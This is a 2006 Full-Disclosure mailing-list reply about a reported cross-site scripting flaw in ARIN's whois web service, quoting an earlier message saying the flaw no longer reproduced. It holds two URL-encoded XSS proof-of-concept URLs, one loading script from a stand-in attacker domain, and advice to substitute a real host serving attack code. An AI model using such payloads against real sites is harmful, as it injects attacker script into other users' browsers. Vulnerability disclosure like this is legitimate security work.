[Full-disclosure] Re: Arin.net XSS
Terminal Entry
Security at peadro.net
Fri Mar 3 16:50:29 GMT 2006
Dave,
You need to copy and paste the full URL into your browser for the XSS to take place. All exploit examples are still working as I just verified.
<copy> http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E </paste>
<copy> http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E </paste>
For my second example I used a fake domain name as an example of where the malicious code could be executed. Change the "maliciouscode.net" to a domain hosting your .js code for the exploit to take effect.
Thanks,
Discovered by Terminal Entry security [.at.] peadro (.)net
-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Dave
Korn
Sent: Friday, March 03, 2006 9:53 AM
To: full-disclosure at lists.grok.org.uk
Cc: bugtraq at securityfocus.com
Subject: [Full-disclosure] Re: Arin.net XSS
"Terminal Entry" <Security at peadro.net> wrote in message
news:353A3025-099E-41C9-978B-A57B2C80AAE6 at mimectl...
> Notification
> Multiple attempts to contact Arin site administrators went unanswered
Looks like someone was paying at least some attention, because none of
your examples worked when I tried them just now.
> Some demonstration exploit URLs are provided:
>
http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%
28%27XSS%27%29%3B%22%3E
No match found for <IMG SRC="javascript:alert('XSS');">.
>
http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fmalici
ousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E
No match found for <XCRIPT
SRC=http://maliciousCode.net/exploit.js></XCRIPT>.
[ Funnily enough it goes bold after 'SRC=' and the rest of the thing
turns
into a borken link to "http://maliciousCode.net/exploit.js></XCRIPT>" ]
>
http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%
28%27XSS%27%29%3B%22%3E
No match found for <IMG SRC="javascript:alert('XSS');">.
cheers,
DaveK
--
Can't think of a witty .sigline today....
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
This email and any files transmitted with it are confidential and intended
solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This
message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate,
distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your
system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this
information is strictly prohibited.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060303/1223a722/attachment.html
Full-Disclosure is hosted and sponsored by Secunia.